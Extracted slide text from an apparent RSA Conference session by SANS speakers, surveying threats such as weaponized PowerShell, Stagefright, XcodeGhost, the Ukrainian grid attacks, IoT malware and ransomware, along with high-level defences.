Persistence
Integrated with attacker operations
All free and incredibly easy to use, and often works even with application
white listing
7. #RSAC
Weaponized PowerShell Defenses
7
Don’t rely on PowerShell’s limited execution policy
A safety feature, not a security feature… trivial to bypass
Enhanced logging in PowerShell 5
Pipeline logging, deep script block logging, and more
Win 10 AntiMalware Scan Interface (AMSI)
All script content presented to registered antimalware solution on the box
PowerShell 5 Constrained Mode and AppLocker integration with “Deny
Mode” and “Allow Mode” – behaves like script white listing
8. #RSAC
Stagefright as a Portent of Mobile Vulns
8
Stagefright: A series of significant vulnerabilities discovered in Android, all
associated with a library that plays multi-media content
Discovered by Joshua Drake at Zimperium through exhaustive fuzzing, and then
detailed analysis of fuzzing results
Code execution via text messaging, video viewing in email, browser video
watching, and more
Google patched it quickly…
... But there’s a problem: For Android devices, the OEMs and Mobile
Operators (carriers) sit between the code developer(s) and customers
Getting patches out in a timely fashion is difficult at best
9. #RSAC
Stagefright-Style Vuln Defenses
9
Upgrade to newer versions of
Android (and don’t forget iOS!)
Implement a corporate
strategy for doing so regularly
Via MDM and network
infrastructure, enforce use of only
up-to-date versions of mobile
operating systems for enterprise
apps and data… Deny others
Give preferential treatment to
Android vendors who push updates
all the way to devices quickly
Google
Code
Owner
SamsungLGMoto
MO 3MO 2MO 1
Android
Phone D
Android
Phone C
Android
Phone B
Android
Phone
A
Flaw
disclosure
Notice
and fix
3rd Party
Software
3rd Party
Software
Both handset
manufacturers and
mobile operators lack
significant financial
reward for continued
support of already-sold
Android devices
10. #RSAC
XcodeGhost – Can You Trust Your Apps?
10
Historically, attacks against source code and dev tools have proven deeply
insidious
Bad guys can no
longer ignore
iOS as a malware
target
With XcodeGhost, they
showed innovative
ways to undermine iOS
Enterprise app store signing is another
1984
Reflections on
Trusting Trust
• Backdoor the
compiler
2004-2010
tcpdump,
Linux kernel
attempt, etc.
• Backdoor
the source
code
2015
XcodeGhost
• Backdoor the dev
environment
11. #RSAC
XcodeGhost – Implications for Defense
11
Analyze the security of permitted apps in your environment
Josh Wright’s App report card
at http:///pen-testing.sans.org/u/64u
Data isolation from mobile devices
Container-based security is waning
Virtualized Mobile Infrastructure is rising
User training can help – don’t install untrusted apps… and tell them why
Look for anomalous activity in the environment
New free RITA (Real Intelligence Threat Anslysis) tool from Black Hills Information Security
http://bit.ly/BHIS_RITA
12. #RSAC
Michael Assante
--Director of SANS ICS Training Programs
--Was VP and CISO of NERC
--Directed INL’s Electric Power Program
--Testified before US House and Senate
13. #RSAC
Lights Out
13
One, of a hand full: acknowledged ICS attacks with physical effects
Cyber attacks against 3 Ukrainian power companies on Dec 23
Successfully cause power outages
Coordinated & multi-faceted
Destructive acts
BlackEnergy 3 Malware plays some role
Additional malware (e.g. customized KillDisk)
14. #RSAC
Power System SCADA 101
14
Distribution Control Center
110 kV Substation
110 kV Substation
35 kV Substation
16. #RSAC
The Attacks
16
Distribution Control Center
Malware is simply a tool used
for specific actions (e.g. access) 1. Intrusion (Foothold)
2. Take over credentials & IT
3. Access & remove relevant data
4. Cross-over into SCADA
5. Change the state of power system
6. Damage firmware
7. Wipe SCADA & infrastructure hosts
Cyber Attack 1. (ICS Kill Chain)
Cyber Attack 2. (Supporting)
1. Flood Customer Phone Line
2. UPS take over & disconnect
19. #RSAC
Dr. Johannes Ullrich
-- Dean of Research at STI: SANS’ Graduate School
-- Director of the Internet Storm Center
20. #RSAC
Software Security: Components Matter
20
Insecure third party components matter!
Development environments, software components (libraries) are
more and more under attack
Developer workstations are high on the target list
21. #RSAC
Apple Xcode Ghost
21
Compromised version of Xcode offered for download on Chinese
sites
Compiled software included
malicious functionality
Unnoticed due to trust relationship
between Apple and developers
23. #RSAC
Mitigation
23
Accountability: Who did it? Version control systems need to keep
a record of which changes were done by whom and why
Software repositories need regular offline backups
Traditional code reviews and pentesting will not fix this
Cryptographic protection against tampering
git blame login.html
24. #RSAC
The Internet of Evil Things
24
The IoT is not just a “target” for its own sake
More and more IoT devices
are used as attack platforms
after they are compromised
26. #RSAC
Multi Architecture Malware
26
81896 Jan 1 00:10 10 <- ELF LSB MIPS
82096 Jan 1 00:10 11 <- ELF MSB MIPS
70612 Jan 1 00:10 13 <- ELF LSB x86-64
48996 Jan 1 00:10 14 <- ELF LSB ARM
65960 Jan 1 00:10 15 <- ELF LSB 386
70648 Jan 1 00:10 16 <- ELF LSB PowerPC
65492 Jan 1 00:10 17 <- ELF LSB 386
2133 Jan 1 00:20 bin2.sh
27. #RSAC
Brute Force Architecture Detection
27
All versions are downloaded and execution is attempted for all of
them.
Initial infection usually implement simple bot (IRC/HTTP as C2C)
Additional components are downloaded later for specific
architectures
“busybox” replaced with trojaned version
28. #RSAC
Change in Malware Economics
28
170 Million Credit Card Holder vs 61 Million Stolen (2014)
450 Million issued SSNs vs 22 Million Stolen (just OPM hack)
142 Million registered voters vs. 191 Million records leaked
ALL DATA HAS BEEN STOLEN
little value in stealing the same data over and over.
Reducing scarcity = Reduced Price
29. #RSAC
Ransom Ware
29
Instead of copying data: Encrypt it
Ransom ware has been going on for a couple years now
Increasing in sophistication (e.g. platform independent Ransom32)
Instead of stealing data from a web site: Shut it down
Used to be more against fringe (e.g. online gambling) sites
Or for political motives
Now used against any site with insufficient DDoS protection